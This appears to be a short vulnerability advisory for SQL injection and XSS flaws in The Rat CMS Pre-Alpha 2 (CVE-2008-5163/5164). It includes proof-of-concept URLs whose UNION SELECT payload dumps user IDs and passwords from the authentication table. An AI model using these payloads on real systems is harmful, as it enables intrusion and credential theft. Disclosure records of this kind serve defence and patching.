The Rat CMS Pre-Alpha 2 SQL Injection and XSS Vulnerabilities (CVE-2008-5163/5164)

### Critical Vulnerability Information - **Vulnerability Description** - **Type**: SQL Injection and Cross-Site Scripting (XSS) - **Application**: The Rat CMS - **Version**: Pre-Alpha 2 - **Vulnerability Details** - **SQL Injection** - **Vulnerable File**: viewarticle.php - **Code Snippet**: ```sql SELECT title, content FROM news WHERE id=$GET['id']; ``` - **Exploitation Method**: - `http://[Target]/[trcms_path]/viewarticle.php?id=[SQL Injection]` - `http://[Target]/[trcms_path]/viewarticle2.php?id=[SQL Injection]` - **POC Exploitation**: - `http://192.168.24.25/trcms/viewarticle.php?id=-9999/**/UNION/**/SELECT/**/user_id,user_password/**/FROM/**/tbl_auth_user--` - `http://192.168.24.25/trcms/viewarticle2.php?id=-9999/**/UNION/**/SELECT/**/user_id,user_password/**/FROM/**/tbl_auth_user--` - **XSS** - **Exploitation Method**: - `http://[Target]/[trcms_path]/viewarticle.php/` - `http://[Target]/[trcms_path]/viewarticle.php?id=` - `http://[Target]/[trcms_path]/viewarticle2.php?id=` - **Key Information** - **Disclosure Date**: 2008.06.28 - **Risk Level**: High - **CVE ID**: CVE-2008-5163 | CVE-2008-5164 - **CWE ID**: CWE-89 | CWE-79 - **Source**: CWU Underground Hacking Team - **Download URL**: `http://downloads.sourceforge.net/the-rat-cms` - **Reference Links** - http://www.securityfocus.com/bid/29959 - http://www.securityfocus.com/archive/1/archive/1/493684/100/0/threaded

Goal Reached Thanks to every supporter — we hit 100%!

The Rat CMS Pre-Alpha 2 SQL Injection and XSS Vulnerabilities (CVE-2008-5163/5164)